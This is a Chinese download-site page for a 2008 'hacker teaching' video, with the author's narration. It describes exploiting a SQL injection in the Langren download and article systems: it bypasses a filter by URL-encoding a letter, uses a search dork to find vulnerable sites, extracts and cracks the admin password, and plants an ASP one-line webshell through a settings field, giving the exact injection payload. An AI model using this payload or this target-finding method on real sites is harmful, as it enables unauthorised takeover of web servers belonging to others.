立即下载浪人下载文章的0DAY漏洞利用

软件大小: 16.4 MB
软件语言: 简体中文
软件类别: 黑客教学 - 黑客动画
授权方式: 共享版
应用平台: Win9X/2000/XP/2003/
更新时间: 2008/8/18 13:41:28
开 发 商: 暂无信息
联 系 人: 暂无联系方式
分享收藏
更多
解压密码:本站默认解压密码:www.987654321sf.com 
推荐等级: 3星级
会员中心: 【账号登录】  【账号注册】  开通VIP下载流程
查毒情况: 尊敬的用户,本站软件个别杀毒安全软件可能会报毒,有可能是误报,但我们不能确定。请下载后自行判断和检测。点击查看详情

[复制下载页面地址给QQ/MSN上的好友]软件介绍

今天做的动画是浪人下载和浪人文章的0DAY漏洞利用
其实也不是什么0DAY啦,就是一个注入漏洞
浪人:www.lre.cn
大家可以快进看
先随便点一个软件下载
官方都更新到2.4了,但是还是官方自己再用,不过也有漏洞哦
把下载地址复制到明小子里面,把I改成%69
看到了吗,没有改之前是不能注入额
恭喜,该URL可以注入!
数据库类型:Access数据库

下面来讲讲关键字的搜索
下载链接若长时间无响应,请稍候再试;无法下载或是其它问题,请给我留言.....就是这一句了
在BAIDU上搜搜看

百度一下,找到相关网页约6,030篇
再看看GOOGLE
 网页  约有12,800项符合
看到了吧
下面正式进入正题,我就不打字了
大家仔细看

我在本机上测试的
Admin_Info
是管理员表
密码是MD5加密的,在WWW.CMD5.COM上可以解密
郁闷。。。。不知道为什么本机老跑不出来
反正我知道密码啦,下面开始拿webshell
如果你们猜的话一定可以猜出来的
本机猜出来了
有些后台是ADMIN.ASP
还有的是LOGIN.ASP
版本不同啦
后台有两种方法拿WEBSHELL
看我演示
OK,这是第一种
下面讲第二种
在网站配置信息里
插入一句话
不是光查
<%eval request("#")%>
这样是不行的
看演示
sss"%><%eval request("#")%><%ViewMessage="c
下载说明里面写上上面的一句话
我都已经写好了
http://localhost/down/Inc\Config.asp

这个是我一句话的地址
然后连接就可以了

88
邪恶领域[一]群
群号:8494875

邪恶领域[二]群
群号:5501649
补充一下
浪人文章也有一样的漏洞
88

评论区        查看评论...

相关说明

    关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - VIP登陆|注册
Copyright © 2007-2021 987654321SF.Com. All Rights Reserved .
本站私服服务端和架设教程由网友发布,仅作学习使用,严禁用于商业
如本站收录的资源侵犯到您的版权,请来信告知,我们将及时更正处理,邮箱:Mail91@QQ.COM
蜀ICP备2022016462号-4
点击与站长面对面交流!